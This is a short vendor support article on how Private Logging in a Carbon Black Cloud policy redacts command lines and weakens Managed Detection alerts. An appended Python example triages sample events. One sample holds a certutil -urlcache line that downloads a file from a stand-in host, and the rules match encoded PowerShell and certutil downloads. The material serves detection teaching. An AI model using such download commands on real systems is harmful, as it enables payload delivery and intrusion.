Managed Detection: Does Enabling Private Logging Cause the Sent Alerts to Contain Less Information?

Environment

  • CBC Web Console: All Versions
  • Managed Detection

Question

Does enabling Private Logging in a CBC policy cause the alerts sent from the Managed Detection team to contain less information?

Answer

Enabling Private Logging within a policy can prevent the Managed Detection team from sending much of the useful information obtained from an alert, thereby limiting the scope of the Managed Detection alerts.

Additional Notes

  • The most important IOC being considered by the Managed Detection team is typically the command line argument, which is redacted if Private Logging is enabled.
  • Enabling Private Logging can prevent the Managed Detection team from identifying "living off the land" attacks.
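
The effect described in the notes above, shown as an added example (not code from this article, the product, or the Managed Detection team): the same triage rules are run over process events with and without the command line. The event field names, the argument patterns, and modelling Private Logging as an absent command line are all assumptions made for illustration.

```python
import re

# Constructed process events, not real telemetry. Field names are hypothetical
# and are not the CBC event schema.
EVENTS = [
    {"host": "ws-01", "process": "powershell.exe",
     "cmdline": r"powershell.exe -File C:\Scripts\backup.ps1"},
    {"host": "ws-02", "process": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -EncodedCommand <base64>"},
    {"host": "ws-03", "process": "certutil.exe",
     "cmdline": r"certutil.exe -verify C:\certs\server.cer"},
    {"host": "ws-04", "process": "certutil.exe",
     "cmdline": "certutil.exe -urlcache -f http://example.test/a.bin a.bin"},
]

# Illustrative argument patterns for built-in tools (assumed, not a vendor rule set).
ARG_RULES = {
    "powershell.exe": re.compile(r"\s-enc(odedcommand)?\b", re.I),
    "certutil.exe": re.compile(r"\s-urlcache\b", re.I),
}

def redact(event):
    """Model Private Logging as the command line being absent (assumption)."""
    return {**event, "cmdline": None}

def triage(event):
    """Return 'suspicious', 'benign', 'undetermined' or 'no_rule' for one event."""
    rule = ARG_RULES.get(event["process"].lower())
    if rule is None:
        return "no_rule"
    if not event.get("cmdline"):
        # The binary itself is a legitimate built-in tool; without arguments
        # there is nothing left to separate admin use from abuse.
        return "undetermined"
    return "suspicious" if rule.search(event["cmdline"]) else "benign"

def summarize(events):
    """Map each host to its verdict."""
    return {e["host"]: triage(e) for e in events}

if __name__ == "__main__":
    print("full telemetry:", summarize(EVENTS))
    print("redacted      :", summarize([redact(e) for e in EVENTS]))
```

With the command line present, the two hosts using the tools for routine work are separated from the two that warrant a look; with it removed, all four events collapse into the same undetermined verdict.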

Article Information

  • Creation Date: 09-09-2020